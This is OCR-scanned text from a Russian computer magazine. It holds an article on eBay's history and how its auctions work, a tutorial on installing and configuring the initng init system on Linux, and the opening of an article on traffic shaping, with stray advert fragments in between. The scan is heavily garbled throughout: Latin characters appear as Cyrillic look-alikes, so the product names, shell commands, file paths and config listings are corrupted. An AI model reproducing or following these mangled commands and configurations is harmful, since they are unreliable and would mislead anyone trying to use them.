чек из-под конфет РЕ2. Эти леденцы на протя- 
жении многих лет выпускали в ярких коробках 
с изображением разнообразных мультяшек. 
Редкие новинки сразу скупались многочис- 
ленными коллекционерами, которые потом 
перепродавали их на территории США. Но вот 
беда — не было никакой возможности тор- 
говать ими в районе залива Сан-Франциско. 
Тогда Омидьяру и пришла в голову необычная 
мысль: а что, если создать необходимые усло- 
вия для работы аукциона в Интернете, чтобы 
коллекционеры из любой точки мира могли 
продавать другим коллекционерам свои цен- 
ности? Так как ранее Пьер работал инжене- 
ром по программному обеспечению, он знал, 
как все можно реализовать технически, и 
незамедлительно воплотил идею в жизнь, 
создав небольшую фирму, параллельно со 
своей основной работой в ѲепегаІ Мадіс». 
Эта «утка» пользуется популярностью и сей- 
час, так как трогательная история широко 
распространялась в середине 90-х. 

Однако официальные лица еВау и 
сам Омидьяр ее уже неоднократно 
опровергали. На самом деле Пьер 
до создания аукциона додумался 
сам — проект стал частью хоумпа- 
ги и реализован был практически в 
шутку. Тот факт, что первой вещью, 
проданной на аукционе, стала сло- 
манная лазерная указка, является 
тому прекрасным доказательством. 

Указка ушла с молотка за $14,83, 
и, когда пораженный Омидьяр, не 
ожидавший, что ЭТО кто-то купит, спросил у 
выигравшего торги человека: «Она сломана, 
вы в курсе? Зачем она вам?», тот ответил: 
«Да, я знаю, просто я коллекционирую сло- 
манные лазерные указки». 

Имя было придумано в 1997-ом году. 
Оригинальный сайт принадлежал ЕсЬо Вау 
ТесИпоІоду Ѳгоир — консалтинговой фирме 
Пьера. Сначала он собирался зарегистриро- 
вать доменное имя ЕсИоВаѵ.сот , но оно ока- 
залось занято золотодобывающей компанией 
ЕсНо Вау Міпез, так что Омидьяру пришлось 
сократить название до еВаѵ.сот . Уже к сере- 
дине 1997-го на еВау проходило по 800,000 
аукционов в день. Пьер в это время занимал 



должности председателя правления компа- 
нии, финансового директора, СЕО (исполни- 
тельного директора), президента. В общем, 
работал без передышки. И, чтобы не загнуть- 
ся от такого графика, в 1998 году пригласил 
к себе в фирму Маргарет «Мед» Уитман, 
которая до этого руководила НазЬго, а также 
работала в Ргосіог & ѲатЫе и Эгеатѵѵогкз. 
Она появилась в компании, когда там работа- 
ло всего 30 человек, обслуживающих исклю- 
чительно США. Мег стала президентом и СЕО, 
и на сегодняшний день, когда в еВау работает 
уже свыше 9,000 человек, она по-прежнему 
твердо стоит у руля, продолжая управлять 
всеми делами. Маргарет Уитман является 
одной из самых состоятельных женщин на 
планете — ее состояние оценивается в $1 ,6 
миллиарда долларов, а в списке влиятельней- 
ших женщин мира от журнала «Форбс» она 
занимает 5 место. 

ДЕЛАЙТЕ СТАВКИ, ГОСПОДА! 

Аукцион еВау — явление действительно выда- 
ющееся и уникальное. Один из лидеров миро- 
вого рынка высоких технологий, чьи финансо- 
вые результаты за последние годы впечатлили 
даже видавших виды экспертов. Бренд еВау 
официально признан самым дорогим брен- 
дом в Сети, оставив позади таких гигантов, 
как УаЬоо! и Атадоп. Капитал компании на 
начало 2006 года составляет почти 50 милли- 
ардов долларов. еВау — также партнер таких 
всемирно известных компаний, как ІВМ, Зип 
Місгозузіетз, Ѵіза и Місгозоіі. Каждый день 
здесь уходят с молотка целые корпорации, 
недвижимость, автомобили и антиквариат, а 
по соседству со всем этим богатством обыч- 
ные люди продают плакатики, брелоки и про- 



Г 



чую мелочевку. На сегодняшний день аукцион 
еВау имеет более 20-ти филиалов по всему 
миру, более 160 миллионов зарегистрирован- 
ных пользователей и сотни миллионов единиц 
товара. еВаѵ.сот — это не просто самый 
популярный аукцион в мире, это настоящий 
рай для коллекционеров, болельщиков, фана- 
тов музыки и кино. Здесь можно найти и купить 
вещи, которые совершенно нереально достать 
у нас в России. Причем купить гораздо дешев- 
ле, чем в интернет-магазинах Признаюсь, я 
сама неоднократно прибегала к услугам еВау, 
покупая вещи, которые у нас достать просто 
невозможно. Это действительно удобно. 
Правда, не могу сказать, что на еВау все 



просто. Чтобы полностью понять принцип 
действия аукциона, разобраться во всех тон- 
костях, выработать свою стратегию ведения 
торгов и прочее, уйдет немало времени. Еще 
сложнее будет, если ты пришел на еВау не 
покупать, а продавать — под боком будут 
миллионы конкурентов со всех уголков света, 
которые тебе на практике продемонстрируют 
старую истину: «не один ты тут такой умный». 
Неудивительно, что существует полно кни- 
жек-самоучителей по аукциону еВаѵ.сот , 
причем далеко не все из серии «...для чайни- 
ков». Продавцом на еВау стать может каждый, 
но научиться действительно грамотно вести 
свои дела и получать от этого прибыль, дано 
не всем. Я не учитель по экономике и бизне- 
су, и даже серии статей было бы мало для 
описания всех тонкостей и нюансов сетевой 
торговли. Поэтому давай вернемся к вещам 
базовым, понятным простым смертным. 

ПРОДАЕМ И ПОКУПАЕМ 

Начать стоит с того, что регистрация на еВау 
совершенно бесплатна, как и членство впос- 
ледствии. Что интересно, зарегистрировавшись 
на любом из 20-ти представительств еВау, ты 
получишь доступ ко всем остальным, под тем 
же Ю и паролем. Есть маленькая хитрость: на 
англоязычном сайте еВаѵ.сот с недавнего 
времени требуется ввести данные о кредитной 
карте. Деньги с карты не снимают, так как она 
нужна лишь для подтверждения личности. Это 
составляет для многих настоящую проблему, 
но можно пройти регистрацию в Голландском 
представительстве еЬау.пІ, где карту не требу- 
ют, и под тем же Ю и паролем получить доступ 
к центральному филиалу. ЕЬау не берет денег 
с покупателей. Никакой комиссии, процентов 

— ничего. Покупать можно, сколько душе угод- 
но, хотя тут есть одно «но». Любимая платежная 
система еВау — РауРаІ — в России не работает, 
да и вообще, все филиалы аукциона (американ- 
ский, канадский, немецкий и т.д.) рассчитаны на 
рынок той страны, в которой они находятся. В 
70% случаев товар доставляется за счет продав- 
ца, но только в пределах соответствующей стра- 
ны. А оплата принимается в основном кредит- 
ными картами, именными чеками, через РауРаІ 
и так далее. РауРаІ почти вытеснил с еВау все- 
мирно популярный и доступный в России сервис 

— ѴѴеЬМопеу. Новичка такой расклад обычно 
сбивает с толку, удивляет и огорчает. Только 
ты найдешь «то самое!», как понимаешь, что 
купить это не получится — оплата через РауРаІ, 
да еще и 113 опіу. 

Впрочем, это вовсе не значит, что русским 
про еВау можно забыть. Если есть спрос, зна- 
чит, появится и предложение. У нас сущест- 
вует несколько десятков фирм-посредников, 
которые работают со всеми филиалами еВау 
и готовы оплатить твой лот, получить его в 
Штатах на свой адрес, а потом переправить 
тебе. Некоторые из этих фирм даже могут 
участвовать в торгах вместо тебя, делать став- 
ки, общаться с продавцом, в общем, берут на 
себя абсолютно все хлопоты. Разумеется, 



Самый громкий провал случился у анонимно- 
го пользователя из Бразилии, который пытал- 
ся толкнуть через еВау списанный авианосец. 
Судно почему-то так никто и не купил. 
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делается это не безвозмездно. Посредники берут за свою 
работу комиссионные в размере 10 — 15% от стоимости това- 
ра. Самая известная контора такого рода — РгедгасШеІ . Ну а 
дальше начинаются сами торги. На еВау существует несколько 
видов аукционов: 

Стандартный аукцион Это самый распространенный метод 
ведения торгов. Обычные аукционные правила, где продавец, 
выставляя лот на продажу, определяет «резервированную цену» 
(Везегѵе Ргісе), ниже которой он не согласен продать свой товар. 
Покупатели, пока идут торги, ее не видят — им лишь доступна 
информация, достигнута она или нет. 



ФРДУД 

Само собой, в таком месте, как еВау, можно запросто влипнуть 
в неприятности, так как здесь полно жуликов и прохиндеев. 
Действуют они просто: либо выставляют на продажу несущест- 
вующие товары и, получив деньги, исчезают, либо впоследствии 
полученный товар не соответствует описанию. Как показывает 
практика, обычно мошенники предпочитают работать с крупными 
лотами стоимостью не менее тысячи долларов. Избежать надува- 
тельства несложно — достаточно обращать внимание на рейтинг 
и читать оставленные предыдущими покупателями отзывы. Для 
отключения аккаунта продавцу достаточно заработать всего 3 
негативных отзыва, так что подозрительных субъектов админы 

быстро блокируют. По 



Самым большим лотом в истории стала под- 
водная лодка времен Второй Мировой, как не 
имеющая больше исторической ценности. 



Голландский аукцион. Такие аук- 
ционы обычно создают продавцы, 
выставляющие несколько товаров 
одного вида. Участвуя в таком аукци- 
оне и делая ставку, ты указываешь не 
только цену, но и количество товара. 

Приватный аукцион. В нем инфор- 
мация продавца и покупателя не 
разглашается. Только после тор- 
гов они обмениваются контактны- 
ми данными в конфиденциальном 
порядке. Такой вид торгов исполь- 
зуется редко. 



Сама по себе система ставок элементарна, но существуют всякие 
хитрости и уловки, на которые идут люди, чтобы выиграть торги. 
Например, очень распространенный способ — снайпинг (от англ, 
зпіре — спереть из-под носа). Снайперы выжидают, включаясь в 
торги за несколько секунд до их окончания. Делают ставку так, 
чтобы у остальных покупателей просто не осталось времени 
на ответную ставку. Так как на еВау после новой ставки время 
торгов за лот не продлевается (распространенная антиснайпинг 
защита, принятая на многих инет-аукционах), часто снайперы на 
самом деле оказываются в выигрыше. И далеко не все они дела- 
ют ставки вручную. Существует огромное количество снайпинг- 
сервисов, готовых предоставить за деньги специальные програм- 
мы, занимающиеся этим вместо тебя. Один из старейших и самых 
популярных таких сервисов — ОпЬіббег. 

Чтобы продавать товары на еВау, нужно присвоить своему аккаун- 
ту статус Продавца. Он выдается после того, как ты внесешь в сис- 
тему данные о своей кредитной карточке, с которой впоследствии 
будут сниматься деньги за сделки, а система безопасности будет 
проверять ее валидность. С продавцов, в отличие от покупателей, 
еВау взимает комиссионные с каждой сделки как за выставление 
лота на торги, так и в случае успешной продажи товара. 
Продавцам предоставляются всевозможные платные сервисы: 
еВау Рісіиге Зегѵісез, еВау ЗеІІег Тооіз, Ідзііпд ІІрдгасІе и т.д., 
можно торговать и в отдельных сегментах еВаѵ.сот : еВау Моіогз, 
еВау Зіогез, еВау ВеаІ Езіаіе. Например, еВау Зіоге — это лич- 
ный интернет-магазин, организованный прямо на еВау. Открыть 
его можно, когда твой рейтинг (ІеебЬаск) станет больше 20-ти. 
При этом предоставляется целый пакет услуг, характерных для 
е-шопа, и тебе не придется создавать магазин с нуля. Правда, 
в зависимости от возможностей, нужно будет платить компании 
от 16 до 500 долларов в месяц. Раскручивать свой еВау Зіоге ты 
можешь любым способом, которые применяются для раскрутки 
обычных интернет-магазинов. Но продавать разрешается далеко 
не все. Список запрещенных на Ебее товаров довольно велик и 
отличается в разных филиалах. Сюда входят наркотики, лекарс- 
тва, оружие, взрывчатые вещества, товары, нарушающие авто- 
рские права, направленные на подрыв государственного строя, 
разжигающие межнациональную рознь, порнография и т.д. 




сути, весь еВау строится и 
держится именно на этой 
двухсторонней системе 
фидбека: после каждой 
сделки продавец и покупа- 
тель оставляют друг другу 
отзывы с комментариями, 
просматривая которые, 
можно быстро понять, 
что к чему. Продавцы, 
торгующие на аукционе 
ч і еВау профессиональ- 

но, имеют высокий рей- 
тинг: 500, 1000 и более. 
Многие продавцы предла- 
гают страхование товара, 
представляют сертифи- 
каты типа ЗриагеТгасІе 
— это американская пос- 
редническая компания. 

^ Я специализирующаяся на 

разрешении споров и про- 
текции сделок. Такой сер- 
тификат дает железную 
гарантию, что ты имеешь 
дело с проверенным, серьезным человеком. Вообще, к проблеме 
безопасности на еВау подходят очень серьезно. Попытки завести 
несколько аккаунтов, использовать генераторы номеров креди- 
ток при регистрации и прочее пресекаются мгновенно, и неудач- 
ливый аферист получает пожизненный бан. 

ВІ N АП V ѴОІІН'5 ЗС 



основатель аукциона 
еВау — Пьер Омидьяр 
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Студии Лебедес 



Япсіех 

найдётся всё 



короче 



Для хорошей рекламы необходимо 
всего несколько слов. 

Ключевых. 




ІІІЧІХОЮ 




ТЕХТ ДЕНИС КОЛИСНИЧЕНКО 

/ ОН8ІІ_АВ5@МАИ..ПІІ / 




Молниеносная 
загрузка тукса 

Іпііпд — следующее поколение 
начальной инициализации ЗузІетѴ Іпі( 



СЕГОДНЯ МЫ ПОГОВО- 
РИМ О ІІЧГтѲ — новой 
СИСТЕМЕ ИНИЦИАЛИ- 
ЗАЦИИ ТВОЕГО ЫШХ'А. 
ІИІТМО ЯВЛЯЕТСЯ СЛЕДУ- 
ЮЩИМ ПОКОЛЕНИЕМ I N ІТ, 
О ЧЕМ КРАСНОРЕЧИВО 
ГОВОРЯТ СИМВОЛЫ N0 
(ЦЕХТ ѲЕЫЕПАТЮМ) В 
НАЗВАНИИ ЭТОЙ СИС- 
ТЕМЫ. ОСНОВНОЕ ПРИ- 
ЗВАНИЕ ІКПШО — СТАТЬ 
ДОСТОЙНОЙ ЗАМЕНОЙ 
СТАРОМУ ДОБРОМУ ІИІТ. 

В ЭТОЙ СТАТЬЕ МЫ УБЕ- 
ДИМСЯ, ТАК ЛИ ЭТО. 

ІШТ Ѵ8 ШІТЫС 

Что же такого хорошего в іпііпд, что о ней 
заговорили? Чтобы понять суть отличия, 
давай вспомним, как работает классическая 
версия іпіі. Первым делом запускается ядро, 
которое монтирует корневую файловую сис- 
тему и запускает программу инициализации 
/вЫп/іпіІ. С помощью специального парамет- 
ра ядра можно изменить это значение: 

іпіі=/путь/к/программе/инициализации 

Ядро после загрузки успокаивается, так как 
всю дальнейшую работу берет на себя іпіі. 
Если эту программу запустить не удается, то 
ядро паникует, и дальнейшее продолжение 
работы невозможно. Чтобы вычислить тре- 
буемый уровень запуска, іпіі просматривает 
файл /еІс/іпіПаЬ: 

Ій:5:іпі1с1е1аи11: 



Затем, в зависимости от уровня, іпіі запус- 
кает сценарии из каталога / еіс/гс.сі и его 
подкаталогов. Здесь ключевая фраза — 
«запускает сценарии», выполнением кото- 
рых занимается командный интерпретатор 
(обычно /Ып/ЬавЬ), то есть «посторонняя» 
программа. 

Іпііпд самостоятельно выполняетсвои файлы 
конфигурации, в которых указаны действия 
по инициализации системы, в результате 
чего время загрузки системы резко сокра- 
щается. Действительно, с использованием 
іпііпд мой РОЗ стартует практически мгно- 
венно. После того как я все правильно 
настроил и перезапустил систему, я даже 
сначала не понял, что загрузка системы уже 
завершена. 

ПОДГОТОВКА К УСТАНОВКЕ 

Скачать іпііпд можно по адресу: іпііпд. 
ІЫпкІих.пеІ/боѵѵпІоаб/ѵ0.5/ (либо взять о 
нашего СО/ОѴО). Там будут как файлы, 
содержащие исходный код, так и уже отком- 
пилированные грт-пакеты. Советую скачать 
именно исходный код, причем самую пос- 
леднюю версию. 

Лично я использую І_іпцх не только для экс- 
периментов, но и для повседневной работы, 
поэтому не часто переустанавливаю дистри- 



бутивы. Сейчас на моем винте по-соседоки 
разместились І_іпих Мапбгаке 10 и Ребога 
Соге 3. Да, дистры не первой свежести, но 
они меня вполне устраивают. 

Сначала я попытался установить іпііпд в 
моем любимом І_іпих Мапбгаке. Установить- 
то я ее установил, но работать «система 
инициализации следующего поколения» 
отказалась. Почему? Она рассчитана на... 
более новые дистрибутивы. Если попы- 
таешься установить грт-пакет с іпііпд на 
1_іпих Мапбгаке 10 или на ту же Ребога Соге 
3, то ты увидишь, что нужно для установки 
этой версии. Версия 0.5.3 требует пакет 
Іііезувіет версии 2.2.4 или выше, библио- 
теку дІІЬс версии 2.3.4 или выше, а также 
наличие ЗЕЫпих. 

Устанавливать Мапбгіѵ'у из-за іпііпд я пос- 
читал излишним, поэтому «под нож» пустил 
третью версию Ребога Соге. В данной вер- 
сии присутствует пакет Іііевузіет версии 
2.3, есть ЗЕЫпих, а то, что нет дІІЬс версии 
2.3.4 — не беда. Я предпочитаю компили- 
ровать іпііпд из исходных кодов, поэтому 
при сборке будет использоваться та версия 
дІІЬс, которая есть в наличии (2.3.3). При 
попытке установить грт-пакет на РСЗ без 
удовлетворения зависимостей выясняется, 
что іпііпд работать не будет. Причем об этом 



126 



ХАКЕР 03 /87/ 06 



красноречиво доложит само ядро, когда 
при перезагрузке ты увидишь сообщение 
о невозможности запуска іпііпд (поскольку 
грт от разработчиков собран на дІІЬс вер- 
сии 2.3.4). 

Если ты сторонник прекомпилированных 
пакетов, и у тебя самый новый дистрибутив, 
то тогда качай свежий грт и разворачивай 
его с помощью такой команды: 

# грт-ІЬѵ Іпііпд-0. 5.3-1 .ІЗЙб.грт 

УСТАНОВКА ШІТГ1С 

Сначала я установил іпііпд на реальную 
(физическую) систему — свой домашний ком- 
пьютер. После этого, когда іпііпд прекрасно 
на нем заработал, я все повторил в виртуаль- 
ной машине ѴМѴѴаге. Этим я сразу убил двух 
зайцев: ответил на твой вопрос относитель- 
но использования іпііпд в ѴМѴѴаге и сделал 
скриншоты начальной загрузки системы. 
Перед установкой іпііпд убедись, что у тебя 
установлен компилятор дсс, программы 
аиіотаке, аиіосоп I, а также заголовочные 
файлы — все это нужно для сборки іпііпд. 
Чтобы не было недоразумений, все пос- 
ледующие действия выполняй от имени 
гооі. Распакуй іпііпд-0. 5. З.іаг.ді в ката- 
лог /изг/згс. В результате будет создан 
/изг/згс/іпіІпд-0 .5 .3 . Перейди в него и выпол- 
ни команду: 

# ./аиіодеп.зіт 

По сравнению с ./сопіідиге новый сценарий 
более информативен, к тому же он запуска- 
ет ./сопіідиге для создания Макеіііе. Далее 
введи команды: 

# таке 

# таке іпзіаіі 

Скорее всего, у тебя не возникнет проблем 
со сборкой іпііпд. Если таковые все же 
имеются, значит, ты что-то не установил. 
Запусти аиІодеп.зЬ еще раз и внимательно 
посмотри, что он тебе «пишет». Можно даже 
перенаправить вывод в файл, чтобы затем 
не спеша просмотреть его. 

Кроме цели іпзіаіі доступны еще две: 

# сіеап — удаляет откомпилированные файлы 
из каталога, содержащего исходный код 

# ипіпзіаіі — удаляет іпііпд 

Нельзя забывать и о соответствующей 
настройке загрузчика. Ведь нам нужно 
добавить параметр ядра іпіі, чтобы каждый 
раз не указывать его при загрузке. Если у 
тебя 6160, открой в любом редакторе файл 
/еіс/іііо.сопі, скопируй секцию ітаде, описы- 
вающую твое основное ядро, и отредактируй 
ее, добавив в директиву аррепсі параметр 
«іпіІ=/зЬіп/іпіІпд». После редактирования файла 
загрузчик должен перечитать свой конфиг. Для 
этого введи команду: 



# Міо 

Если у тебя дгиЬ (скорее всего, так оно и 
есть), то добавь в файл /ЬооІ/дгиЬ/дгиЬ.сопІ 
следующие строки: 

ІІІІе Ііпих-іпііпд 

кегпеі (МсІО.І )/ѵтІіпи2-2.6.9-1 .667 

гооІ=/(1еѵ/ІісІа2 

іпіІ=/зЬіп/іпііпд 

Обрати внимание на раздел с установлен- 
ным І_іпих, а также на название файла ядра. 
В этом случае я предполагаю, что ты уста- 
новил Ыпих на /6еѵ/ЬсІа2 (параметр гооі, 
задающий корневую файловую систему). 
Файл ядра называется ѵтііпц2-2.6.9-1 .667 
и физически находится на том же разде- 
ле — конструкция (МсІО.І) соответствует 
/сіеѵ/Ма2. В случае с дгиЬ нет необходимос- 
ти в перезаписи загрузчика. 

запуск ігитгіс 

Для запуска І_іпих с іпііпд в меню загрузчи- 
ка нужно выбрать запись, обеспечивающую 
старт твоей системы с іпііпд. Итак, волнитель- 
ный момент, Линукс стартует. Сначала, как 
обычно, — ядро, а затем — іпііпд. Отмечу, что 
іпііпд запускает адеііу для всех терминалов, 
кроме Пуі. На первом терминале постоянно 
будут отображаться «остатки» загрузки сис- 
темы, которые можно пролистать с помощью 
ЗМІН+РдІІр/РдОп. Регистрироваться можно 
на любой консоли, начиная со второй (Ну2), 
нажав АІІ+Р2. 

КОНФИГУРАЦИОННЫЕ ФАЙЛЫ 

Все конфигурационные файлы іпііпд делят- 
ся на две группы: файлы уровней запуска 
и файлы служб. Первые находятся в самом 
каталоге /еіс/іпііпд, имеют расширение 
«.гипіеѵеі» и содержат список служб, кото- 
рые должны быть выполнены на соответс- 
твующем уровне. Вторые находятся в под- 
каталогах каталога /еіс/іпііпд и имеют рас- 
ширение «.і». 

Существует три основных файла уров- 
ней запуска: сіеіаиіі. гипіеѵеі, зіпдіе. гипіеѵеі 
и зузіет. гипіеѵеі. Первый — это уровень 
запуска по умолчанию, второй — однополь- 
зовательский режим (уровень 1), третий — 
системный уровень. С первым файлом все 
ясно — он запускает твой уровень по умол- 
чанию. Третий файл обеспечивает загруз- 
ку первого уровня запуска, то есть зіпдіе- 
режима — он подготавливает все необхо- 
димое для работы системы. А как же файл 
зіпдіе. гипіеѵеі/ Он предназначен для «рас- 
ширения» первого уровня запуска. В 
нем находится всего лишь одна инструк- 
ция — вызов системного уровня (зузіет), 
но при необходимости ты можешь доба- 
вить сюда вызовы дополнительных про- 
грамм, не редактируя файл зузіет. гипіеѵеі. 
При установке іпііпд формируется файл 
сіеіаиіі. гипіеѵеі: в него добавляются запи- 



си сервисов, которые должны запускаться 
на том уровне, который на момент уста- 
новки іпііпд был уровнем по умолчанию 
в твоей системе. Например, если у тебя 
система запускалась на пятом уровне, то в 
сіеіаиіі. гипіеѵеі будут добавлены все необхо- 
димые записи, чтобы после перезагрузки с 
іпііпд ты не почувствовал никакой разницы 
(кроме, разумеется, скорости загрузки). 

При установке іпііпд я работал на третьем 
уровне, поэтому был создан следующий 
файл сіеіаиіі. гипіеѵеі'. 

зузіет 

йаетоп/кіодгі 

сІаетоп/еІІгО 

(іаетоп/зузіодсі 

(іаетоп/ззіісі 

йаетоп/дрт 

йаетоп/хіпеМ 

сіаетоп/зепсітаіі 

(іаетоп/хіз 

Первая строка — это вызов системного 
уровня запуска, который является обяза- 
тельным для всех уровней. Уровень зузіет 
содержит жизненно важные инструкции 
для работы системы: исіеѵ, загрузку моду- 
лей, поддержку ІІЗВ и сети (интерфейс Іо), 
запуск адеііу для терминала, загрузку сис- 
темного шрифта, запуск ірІаЫез и многое 
другое. Открой файл зузіет. гипіеѵеі, и ты 
сам все поймешь. Однако редактировать 
его стоит только в том случае, если ты пол- 
ностью уверен в своих действиях. 

После этого запускается демон протоко- 
лирования ядра (кіодб), конфигурируется 
интерфейс еІІтО, запускаются демон сис- 
темного журналирования, ЗЗН-сервер, 
дрт — это сервис мыши в консоли, хіпеіб — 
так называемый суперсервер, зепбтаіі — 
агент МТА, а хіз — сервер шрифтов. 

Зайди в подкаталог баетопз. В нем ты най- 
дешь і-файлы для запуска большинства 
демонов (служб), которые могут быть уста- 
новлены в твоей системе. Например, для 
запуска ѴѴеЬ-сервера используется файл 
біірб.і. Чтобы ѴѴеЬ-сервер запускался авто- 
матически при запуске системы, добавь в 
файл сіеіаиіі. гипіеѵеі строку: 

йаетоп/бНрсІ 

Более корректным способом добавления 
служб на уровень запуска является исполь- 
зование программы пд-ирсіаіе, поскольку 
она учитывает зависимости между службами. 
Что это такое? Например, у нас есть демон 
Б, который зависит от службы А. Если ты 
хочешь добавить в уровень демон Б, то нужно 
прописать его после А, которая должна быть 
уже запущенной к моменту запуска Б. То есть, 
редактируя файлы уровней, ты должен четко 
понимать, что делаешь. Если в чем-то не уве- 
рен, используй пд-црсіаіе — эту программу мы 
рассмотрим чуть позже. 
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1-ФАЙЛЫ 

Перед тем как перейти к рассмотрению формата і-файлов, нужно 
знать, какие типы служб можно описывать в этих самых і-файлах. 
Службы бывают трех типов: демоны (баетоп), сервисы (зегѵісе) 
и виртуальные службы (ѵігіиаі). 

Демон запускается и после запуска не завершает свою рабо- 
ту, оставаясь в памяти. Может получить один из двух статусов 
— РІІЫІМІЫѲ, означающий, что демон нормально работает, или 
РАІІ__$ТАВТІЫѲ — запуск демона завершился с ошибкой. Если 
при запуске демона произошел сбой, то все зависящие от него 
службы будут остановлены. 

Сервис запускается, выполняет свою работу (например, мон- 
тирует файловые системы или загружает системный шрифт), 
а потом завершается. 

Виртуальная служба вообще ничего не делает, она просто 
зависит от других. Если «виртуал» загружен, то можно быть 
уверенным — все службы, от которых он зависит, запущены. 
Рассмотрим пример файла даетоп/ЫІрд. 'г. 

сіаетоп баетоп/іііірсі { 

леей = зузіет/Ьооітізс; 
гедиіге_пе(иогк; 

иве = гіаетоп/ззНсІ баетоп/тузрі баетоп/розідгез зувіет/пеітоипі; 
ехес сіаетоп = /ивг/вЫп/іііірсі; 
рісНІІе = /ѵаг/гип/іііірсі.рісі; 

} 

Ключевое слово баетоп говорит само за себя: іііірб — демон. 
Іпііпд различает службы не по имени файла, а по идентифи- 
катору, стоящему после служебного слова баетоп (зегѵісе/ 
ѵігіиаі), что позволяет описывать в одном файле нечто вроде: 

сіаетоп баетоп/адеііу/* ! 
пеесі = зузіет/Ьооітізс; 
епѵ 0ЕѴ_РВЕ=Ну; 

ехес сіаетоп = /зЬіп/адеІІу 38400 $ЮЕ\/_РВЕ}$(1\1АМЕ); 
гезрашп; 

) 

Вернемся к нашему іііірб. Директивы пееб и изе позволяют 
строить зависимости (об этом мы поговорим чуть позже). 
Демону іііірб нужна сеть, соответственно, без гедиіге-пеіѵѵогк 
не обойтись. Ехес задает исполняемый файл службы (демона). 



Имя файла с уникальным идентификатором процесса службы 
указывается с помощью ріб_ііІе. 

Я не случайно привел листинг службы-демона адеііу. Обрати 
внимание на директивы ЕІМѴ и гезраѵ/п. Первая используется 
для установки переменных окружений, а вторая перезапускает 
службу в случае ее аварийного завершения. 

ЗАВИСИМОСТИ И КОНФЛИКТЫ 

Директива пееб указывает службы, от которых зависит и наша. 
Если данные службы не были запущены, то перед запуском 
іпііпд запустит все, что ты указал с помощью пееб. 

Директива изе используется иначе: она просто указывает, 
какие службы может использовать и наша служба. Если ее 
данные не запущены, іпііпд не станет их запускать. Директива 
изе используется для того, чтобы определить порядок запуска 
служб. Данная информация учитывается при добавлении их на 
требуемый уровень с помощью утилиты пд-црбаіе. 

Директива сопііісі позволяет установить службу, с которой 
наша служба конфликтует. Например, ѵѵи-іірб может конфлик- 
товать с РгоЕТРЭ, а зепбтаіі — с розіііх. В системе не может 
быть двух служб, выполняющих одни и те же или взаимообрат- 
ные действия. 

УТИЛИТЫ ИСС И N6— ЦРОАТЕ 

Первая используется для запуска/останова службы (аналог 
зегѵісе в іпіі), а вторая — для добавления службы на указанный 
уровень запуска. Синтаксис следующий: 

пдс «действие» <служба> 

пд-црбаіе «действие» <служба> «уровень запуска» 

Рассмотрим несколько примеров: 

пдс -и іііірб — запуск ііііріі 
пдс -б іііірб — останов ііііріі 
пдс -іі — помощь 

Г добавляем запуск пеі/рррО на уровень беіаиіі */ 
пд-ирбаіе абб пеі/рррО беіаиіі 
Г удаляем запуск пеі/еіііі из беіаиіі */ 
пд-ирбаіе беі пеі/еіііі беіаиіі 

ІИІТИС И ИКСЫ 

Нельзя не отметить, что іпііпд состоит в небольшом конфликте 
с X ѴѴІпбоѵѵ. Это связано с установкой новой системы иници- 
ализации мышки, которая будет называться не /сіеѵ/тоизе, а 
/беѵ/рзаих (так оно и должно быть), поэтому при необходи- 
мости нужно немного скорректировать конфиг ХЕгее86/ХОгд. 
И еще: если у тебя видеокарточка от пѴібіа, придется немного 
«пошаманить» над драйверами пѵібіа (подробности смотри в 
іпііпд -0.5. 3/сІос/іпіІпд .1x1). 

ДИАГНОЗ 

Буду краток: іпііпд не только можно использовать, но и нужно. 
Значительно сократилось время запуска системы, появилось 
больше возможностей по настройке служб, поскольку іпііпд 
намного гибче своего предшественника. Іпііпд не сложен, 
просто в первое время работа с ним может показаться немно- 
го непривычной. Если возникнут трудности — напиши, я тебе 
подскажу, что и как нужно сделать. 

ВІНАКѴ ѵоик'5 т 
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ТЕХТ АШВЕУ МАТѴЕЕѴ 

/ АЫОП(І5НОСК@КЕАІ_.ХАКЕР.В1І / 



Нарезаем трафик 
ломтиками 

Выжми все из своего интернет-канала! 



ОГРАНИЧЕНИЕ ПРОПУСКНОЙ СПО- 
СОБНОСТИ КАНАЛА, КЛАССИФИКА- 
ЦИЯ ОЧЕРЕДЕЙ ВХОДЯЩЕГО/ИСХО- 
ДЯЩЕГО ТРАФИКА И ПРИОРИТЕЗА- 
ЦИЯ СЕТЕВЫХ ПАКЕТОВ — ВОТ ТРИ 
КЛЮЧЕВЫХ КОМПОНЕНТА, КОТОРЫЕ 
ПОЗВОЛЯТ НАМ ЗАЛОЖИТЬ ОТЛИЧ- 
НЫЙ ФУНДАМЕНТ ДЛЯ КАЧЕСТ- 
ВЕННОГО И КОЛИЧЕСТВЕННОГО 
ДОСТУПА В СЕТЬ. НО КАК ЗА СЧЕТ 
РАЗЛИЧНЫХ ОГРАНИЧЕНИЙ МОЖНО 
ДОСТИГНУТЬ ОПТИМАЛЬНОЙ СКОРО- 
СТИ ПЕРЕДАЧИ ДАННЫХ, ВЫДЕЛЕН- 
НОЙ ПРОВАЙДЕРОМ? ОКАЗЫВАЕТСЯ, 
ОЧЕНЬ ДАЖЕ ВОЗМОЖНО, ОСО- 
БЕННО ПРИ ОДНОВРЕМЕННОМ 
□ОѴѴМЕОАЦ/ЦРЬОАЦ, И СЕГОДНЯ мы 
ПОКАЖЕМ КАК. 




ВВЕДЕНИЕ В ПРОБЛЕМУ 

Каждый из нас стремится использовать 
доступный канал на все 100%. Виндузятники 
один за одним качают кркеры Интернета и 
«умные» менеджеры закачек, не забывая при 
этом бороздить минное поле под названием 
реестр. Юниксоиды поступают несколько 
иначе. Перекомпиляция ядра с различными 
сетевыми настройками и твикинг значений 
переменных стека ТСР/ІР — вот лишь непол- 
ный перечень мероприятий, после проведе- 
ния которых подавляющее большинство мнит 
себя классными специалистами по сетевой 
подсистеме *піх и с гордостью наслаждает- 
ся фиктивным увеличением скорости пере- 
дачи данных. Но стоит признать, победная 
эйфория быстро проходит, когда во время 
заливки двухгигабайтной аѵі'шки тюнинговая 
ось сваливается в бсІЬ с сообщением кегпеі 
рапіс... 

Приведу еще один пример: ты преспокой- 
но админишь удаленную тачку по ззб, вдруг 



без видимой причины ззН-сессия начина- 
ет лагать, команды вводятся с задержкой, 
вплоть до разрыва соединения. После долгих 
выяснений дело оказывается не в ядре и не 
в операционке, а в соседе с третьего этажа, 
который по Йр начал качать новый фильм с 
участием Елены Берковой, заняв весь канал. 
Напрашивается вопрос: как в таком случае 
гарантировать себе и другим пользователям 
нормальную работу по определенным прото- 
колам, скажем, ззИ или ісц/ігс? 

Единственный правильный и действительно 
эффективный способ — организовать тра- 
